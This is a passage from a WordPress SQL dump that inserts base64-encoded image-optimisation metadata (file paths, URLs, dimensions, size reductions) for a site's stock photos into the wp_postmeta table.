taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjYyMSwidGltZSI6MTQ4MzU4MzkyNSwiaWQiOjcxMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODI0LCJ0aW1lIjoxNDgzNTgzOTI5LCJpZCI6NzExfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo4NDAsInRpbWUiOjE0ODM1ODM5MzMsImlkIjo3MTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjA1MzQ2NDcwLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzIwNTM0NjQ3MC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yMDUzNDY0NzAtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMDIsInRpbWUiOjE0ODM1ODM5MzcsImlkIjo3MTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30069, 709, 'wpfc_optimisation_reduction', '3045001'); 
INSERT INTO `wp_postmeta` VALUES (30070, 709, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLmpwZyIsIndpZHRoIjozMDE5LCJoZWlnaHQiOjMxMDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNzYwODM2MzEuanBnIiwicmVkdWN0aW9uIjozMDQ0OTg4LCJ0aW1lIjoxNDgzNTgzOTQ4LCJpZCI6IjcwOSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzOTUxLCJpZCI6NzA5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja183NjA4MzYzMS03Nzl4ODAwLmpwZyIsIndpZHRoIjo3NzksImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja183NjA4MzYzMS03Nzl4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja183NjA4MzYzMS03Nzl4ODAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Mzk1NSwiaWQiOjcwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNzYwODM2MzEtNzY4eDc4OS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjc4OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNzYwODM2MzEtNzY4eDc4OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNzYwODM2MzEtNzY4eDc4OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM5NTksImlkIjo3MDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTE1NTh4MTYwMC5qcGciLCJ3aWR0aCI6MTU1OCwiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja183NjA4MzYzMS0xNTU4eDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTE1NTh4MTYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM5NjMsImlkIjo3MDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzOTY2LCJpZCI6NzA5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja183NjA4MzYzMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja183NjA4MzYzMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja183NjA4MzYzMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Mzk2OCwiaWQiOjcwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNzYwODM2MzEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNzYwODM2MzEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNzYwODM2MzEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM5NzEsImlkIjo3MDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzOTc0LCJpZCI6NzA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzOTc2LCJpZCI6NzA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzOTc5LCJpZCI6NzA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzOTgxLCJpZCI6NzA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzOTg0LCJpZCI6NzA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzc2MDgzNjMxLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzOTg3LCJpZCI6NzA5fV0='); 
INSERT INTO `wp_postmeta` VALUES (30071, 706, 'wpfc_optimisation_reduction', '12812'); 
INSERT INTO `wp_postmeta` VALUES (30072, 706, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4Mzk5MiwiaWQiOiI3MDYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTM2LCJ0aW1lIjoxNDgzNTgzOTk2LCJpZCI6NzA2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTMwMiwidGltZSI6MTQ4MzU4Mzk5OSwiaWQiOjcwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjExOTgsInRpbWUiOjE0ODM1ODQwMDMsImlkIjo3MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjUxOTQsInRpbWUiOjE0ODM1ODQwMDgsImlkIjo3MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0OTksInRpbWUiOjE0ODM1ODQwMTEsImlkIjo3MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MjUsInRpbWUiOjE0ODM1ODQwMTQsImlkIjo3MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzQyOTc4MTcxMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja180Mjk3ODE3MTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNDI5NzgxNzExLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NTUsInRpbWUiOjE0ODM1ODQwMTgsImlkIjo3MDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90